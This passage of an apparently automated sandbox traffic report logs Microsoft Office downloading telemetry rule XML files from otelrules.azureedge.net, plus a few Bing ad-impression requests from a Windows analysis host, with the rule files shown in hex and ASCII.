2024-11-21 08:53:59 UTC	400	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.2.6	49796	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:59 UTC	192	OUT	GET /rules/rule120644v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:53:59 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:59 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7D702D0" x-ms-request-id: 171ae584-101e-005a-6763-3b882b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085359Z-178bfbc474bh5zbqhC1NYCkdug000000011g00000000g28x x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:53:59 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.6	49797	2.23.209.185	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:00 UTC	444	OUT	GET /aes/c.gif?RG=e0f6291961714da0886133ec96c47f0c&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20241121T085354Z&adUnitId=11730597&localId=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&deviceId=6966555320912735&anid=DA18C8825356BAC4E7B23066FFFFFFFF HTTP/1.1 Accept-Encoding: gzip, deflate User-Agent: WindowsShellClient/9.0.40929.0 (Windows) Host: www.bing.com Connection: Keep-Alive Cookie: MUID=3C4135E85708611F0A8020D6566A6038
2024-11-21 08:54:00 UTC	777	IN	HTTP/1.1 200 OK Cache-Control: private,no-store Pragma: no-cache Vary: Origin P3P: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 240CE8DC21F44F3A8AE8AB1468A1671C Ref B: FRA31EDGE0519 Ref C: 2024-11-21T08:54:00Z Content-Length: 0 Date: Thu, 21 Nov 2024 08:54:00 GMT Connection: close Set-Cookie: _EDGE_S=SID=3917F3AD2D4667EF0C48E6932CCD66C2; path=/; httponly; domain=bing.com Set-Cookie: MUIDB=3C4135E85708611F0A8020D6566A6038; path=/; httponly; expires=Tue, 16-Dec-2025 08:54:00 GMT Alt-Svc: h3=":443"; ma=93600 X-CDN-TraceID: 0.33d01702.1732179240.1d2db45a

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.2.6	49798	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:01 UTC	192	OUT	GET /rules/rule120645v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:01 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:01 GMT Content-Type: text/xml Content-Length: 425 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BBA25094F" x-ms-request-id: c2180679-501e-008f-16bc-3b9054000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085401Z-178bfbc474bw8bwphC1NYC38b4000000010g00000000at6s x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:01 UTC	425	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.2.6	49799	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:01 UTC	192	OUT	GET /rules/rule120646v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:01 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:01 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2BE84FD" x-ms-request-id: 76e95f1f-101e-0034-7059-3b96ff000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085401Z-178bfbc474bp8mkvhC1NYCzqnn00000001600000000009x2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:01 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
74	192.168.2.6	49800	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:01 UTC	192	OUT	GET /rules/rule120647v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:01 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:01 GMT Content-Type: text/xml Content-Length: 448 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB389F49B" x-ms-request-id: c1a1e3cb-901e-005b-1f8c-3a2005000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085401Z-1777c6cb7544nvmshC1TEBf7qc0000000as0000000003530 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:01 UTC	448	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>

Session ID	Source IP	Source Port	Destination IP	Destination Port
75	192.168.2.6	49801	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:01 UTC	192	OUT	GET /rules/rule120648v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:02 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:01 GMT Content-Type: text/xml Content-Length: 491 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B98B88612" x-ms-request-id: e8058699-501e-000a-6dc3-3b0180000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085401Z-r1d97b99577kk29chC1TEBemmg0000000a3g00000000c9uh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-21 08:54:02 UTC	491	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
76	192.168.2.6	49802	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:01 UTC	192	OUT	GET /rules/rule120649v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:02 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:01 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT ETag: "0x8DC582BAEA4B445" x-ms-request-id: 5ac7c1c0-801e-0083-5da5-3bf0ae000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085401Z-r1d97b99577656nchC1TEBk98c0000000a3000000000ct2f x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:02 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.6	49803	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:02 UTC	822	OUT	GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8Z_v81Dv1u-hUjbGzlJ65tzVUCUyPu4-NplKM68oFgfLVKaAhGbxhP_Yix7rD1yj3DZeTe9ESVs0HufByhMqtMcvIiBN_vJ4uZO_8-OrObcoMEbWIif1LYVW0nbRv88628l9nxeu-547jSfRBWpiuOQibrC0OFZZITZ_DI0RcIKA3BrqS%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZm9uZWRyaXZlLmxpdmUuY29tJTJmJTNmb2NpZCUzZGNtbTA3YjdkbnU0%26rlid%3D863654e9941b19c80bb133d761025d5c&TIME=20241121T085354Z&CID=531098720&EID=&tids=15000&adUnitId=11730597&localId=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&deviceId=6966555320912735&anid=DA18C8825356BAC4E7B23066FFFFFFFF HTTP/1.1 Accept-Encoding: gzip, deflate User-Agent: WindowsShellClient/9.0.40929.0 (Windows) Host: g.bing.com Connection: Keep-Alive Cookie: MUID=3C4135E85708611F0A8020D6566A6038; _EDGE_S=SID=3917F3AD2D4667EF0C48E6932CCD66C2; MR=0
2024-11-21 08:54:02 UTC	763	IN	HTTP/1.1 204 No Content Cache-Control: no-cache, must-revalidate Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Set-Cookie: MSPTC=DiXftFnJMRBDDJnJrVAt7qbcv5ul8hzGyptIOgfMlSg; domain=.bing.com; expires=Tue, 16-Dec-2025 08:54:02 GMT; path=/; Partitioned; secure; SameSite=None Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * X-Cache: CONFIG_NOCACHE Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 5516409DE58B494DA220FDF7CE2759EA Ref B: EWR30EDGE1005 Ref C: 2024-11-21T08:54:02Z Date: Thu, 21 Nov 2024 08:54:02 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.2.6	49804	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:03 UTC	192	OUT	GET /rules/rule120650v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:03 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:03 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989EE75B" x-ms-request-id: fcdc764c-f01e-0052-4963-3b9224000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085403Z-178bfbc474bwh9gmhC1NYCy3rs000000016000000000hy2u x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:03 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
79	192.168.2.6	49805	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:03 UTC	192	OUT	GET /rules/rule120651v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:03 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:03 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 1aaae978-201e-0096-4377-3bace6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085403Z-178bfbc474bnwsh4hC1NYC2ubs00000001a0000000006g98 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:03 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
80	192.168.2.6	49806	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:03 UTC	192	OUT	GET /rules/rule120652v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:04 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:03 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97E6FCDD" x-ms-request-id: 79a9dcb6-201e-003c-1c7b-3b30f9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085403Z-178bfbc474bvjk8shC1NYC83ns0000000130000000006t1g x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:04 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
81	192.168.2.6	49807	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:03 UTC	192	OUT	GET /rules/rule120653v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:04 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:04 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C710B28" x-ms-request-id: 7511da03-801e-0083-3b8c-3af0ae000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085404Z-r1d97b99577ndm4rhC1TEBf0ps0000000abg0000000005sx x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
